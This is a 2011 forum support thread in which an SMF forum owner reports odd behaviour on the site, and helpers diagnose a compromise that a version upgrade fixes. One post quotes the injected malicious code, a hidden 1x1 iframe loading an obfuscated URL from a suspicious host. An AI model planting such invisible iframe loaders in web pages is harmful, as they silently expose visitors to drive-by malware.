Forum font suddenly gone large and firefox asking for addons

Started by HorTs, February 17, 2011, 05:17:06 AM

Previous topic - Next topic

HorTs

I havent changed any settings but the forum'f font has suddenly gone larger and firefox is asking to install addons for the site.

The forum is www.thelatebay.com

We're on 2.0 RC4.

HorTs

When I try to log in, it allows me to enter my username and password but when you click login it just displays what looks like a small square in the top left corner.

The forum seems to be working fine on tapatalk.

HorTs

When I try to log in and the small square appears.

This is the source code

<iframe src="http://mkgk5jswhgfnxg.vv.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAwcCAQMMAw==" width="1" height="1"></iframe>

Illori

do you have any other php apps running on your server? have you installed the RC4 patch or willing to upgrade to RC5?

Arantor

Uh oh, looks like your forum's code has been compromised. It's possible to go through and manually disinfect, but really you'd be better following the large upgrade to 2.0 RC5 which would disinfect it and get you all the bugfixes and security patches at the same time.
Holder of controversial views, all of which my own.


Illori

which is why i asked my questions above, trying to take it one step at a time...

Arantor

I wouldn't even bother asking questions. It's been compromised - I'd argue the first step is to take out the infection before going any further.
Holder of controversial views, all of which my own.


HorTs

Thanks for your replies.

I followed the advice and installed 2.0 RC5 and it seems to have rectified the problem.

When you say comprimised, could you explain that a bit more?

HorTs

Is there anything else I can do to ensure this doesn't happen again?

Illori

do you have any other php apps on your server? make sure all are updated and you use correct file permissions can help.

compromised=hacked

HorTs

Will the 2.0 RC5 large update definately have removed the infection?

Arantor

Yes because it replaces every core SMF file when you upgrade, thus removing anything that wasn't there before.
Holder of controversial views, all of which my own.



Advertisement: